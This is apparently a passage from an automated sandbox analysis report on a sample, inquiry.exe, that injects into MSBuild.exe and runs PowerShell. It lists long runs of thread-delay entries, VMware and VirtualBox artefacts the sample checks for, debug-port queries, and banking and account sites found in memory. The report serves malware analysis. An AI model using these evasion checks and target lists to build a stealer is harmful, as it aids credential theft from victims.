                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594293Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593373Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593202Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592806Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592266Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592156Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5783Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3558Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6256Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5140Thread sleep count: 3558 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -599375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -599043s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598934s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5140Thread sleep count: 6256 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598823s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598703s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598593s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598344s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598233s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597891s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597778s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597327s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -597108s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -596996s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -596862s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -596681s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -596109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595919s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595810s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595688s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595563s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595327s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595219s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -595078s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594968s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594620s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594406s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594293s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594187s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -594078s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -593969s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -593844s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -593734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -593373s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -593202s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -593079s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592953s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592806s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592703s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592593s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592484s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592266s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6452Thread sleep time: -592156s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599043Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598934Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598823Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598233Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597778Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596996Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596862Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596681Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595919Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595810Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595327Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594620Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594293Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593373Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593202Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593079Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592806Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592266Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 592156Jump to behavior
                    Source: Amcache.hve.15.drBinary or memory string: VMware
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                    Source: Amcache.hve.15.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                    Source: Amcache.hve.15.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                    Source: Amcache.hve.15.drBinary or memory string: vmci.sys
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                    Source: Amcache.hve.15.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.15.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                    Source: Amcache.hve.15.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.15.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.15.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.15.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.15.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                    Source: Amcache.hve.15.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                    Source: Amcache.hve.15.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                    Source: Amcache.hve.15.drBinary or memory string: VMware Virtual USB Mouse
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                    Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.15.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.15.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                    Source: Amcache.hve.15.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                    Source: Amcache.hve.15.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: MSBuild.exe, 0000000A.00000002.3760638359.0000000000E76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                    Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.15.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                    Source: inquiry.exe, 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                    Source: MSBuild.exe, 0000000A.00000002.3763031481.0000000003BF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess queried: DebugPortJump to behavior
